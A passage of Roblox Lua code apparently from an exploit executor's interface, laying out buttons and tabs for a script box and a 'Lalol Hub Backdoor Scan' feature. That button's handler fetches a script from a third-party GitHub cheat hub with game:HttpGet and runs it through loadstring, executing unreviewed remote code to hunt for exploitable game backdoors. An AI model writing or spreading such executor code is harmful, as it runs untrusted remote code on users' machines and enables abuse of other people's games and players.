ClearButton.Name = "ClearButton"
ClearButton.Parent = ExecutorTab
ClearButton.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
ClearButton.Position = UDim2.new(0.3, 0, 0.9, 0)
ClearButton.Size = UDim2.new(0.4, 0, 0.1, 0)
ClearButton.Font = Enum.Font.SourceSans
ClearButton.Text = "Clear"
ClearButton.TextColor3 = Color3.fromRGB(255, 255, 255)
ClearButton.TextSize = 18

UICorner8 = Instance.new("UICorner")
UICorner8.CornerRadius = UDim.new(0, 10)
UICorner8.Parent = ClearButton

ClearButton.MouseButton1Click:Connect(function()
    ScriptBox.Text = ""
end)

-- Scripts Tab
ScriptsTab.Name = "ScriptsTab"
ScriptsTab.Parent = MainFrame
ScriptsTab.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
ScriptsTab.Position = UDim2.new(0, 10, 0, 40)
ScriptsTab.Size = UDim2.new(1, -20, 1, -50)
ScriptsTab.Visible = false

UICorner9 = Instance.new("UICorner")
UICorner9.CornerRadius = UDim.new(0, 10)
UICorner9.Parent = ScriptsTab

ScriptsTabButton.Name = "ScriptsTabButton"
ScriptsTabButton.Parent = MainFrame
ScriptsTabButton.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
ScriptsTabButton.Position = UDim2.new(0, 120, 0, 40)
ScriptsTabButton.Size = UDim2.new(0, 100, 0, 30)
ScriptsTabButton.Font = Enum.Font.SourceSans
ScriptsTabButton.Text = "Scripts"
ScriptsTabButton.TextColor3 = Color3.fromRGB(255, 255, 255)
ScriptsTabButton.TextSize = 18

UICorner10 = Instance.new("UICorner")
UICorner10.CornerRadius = UDim.new(0, 10)
UICorner10.Parent = ScriptsTabButton

ScriptsTabButton.MouseButton1Click:Connect(function()
    ExecutorTab.Visible = false
    ScriptsTab.Visible = true
    ScriptsTabButton.Visible = false
    ExecutorButton.Visible = true
end)

-- Lalol Hub Backdoor Scan button in Scripts Tab
LalolHubButton.Name = "LalolHubButton"
LalolHubButton.Parent = ScriptsTab
LalolHubButton.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
LalolHubButton.Position = UDim2.new(0.1, 0, 0.1, 0)
LalolHubButton.Size = UDim2.new(0.8, 0, 0.15, 0)
LalolHubButton.Font = Enum.Font.SourceSans
LalolHubButton.Text = "Lalol Hub Backdoor Scan"
LalolHubButton.TextColor3 = Color3.fromRGB(255, 255, 255)
LalolHubButton.TextSize = 18

UICorner11 = Instance.new("UICorner")
UICorner11.CornerRadius = UDim.new(0, 10)
UICorner11.Parent = LalolHubButton

LalolHubButton.MouseButton1Click:Connect(function()
    local backdoorScript = [[
        loadstring(game:HttpGet('https://raw.githubusercontent.com/Its-LALOL/LALOL-Hub/main/Backdoor-Scanner/script'))()
    ]]
    local func = loadstring(backdoorScript)
    if func then
        func()
    else
        -- Use StarterGui to display a notification
        game:GetService("StarterGui"):SetCore("SendNotification", {
            Title = "Script Error",
            Text = "Failed to load backdoor scan script.",
            Duration = 5
        })
    end
end)
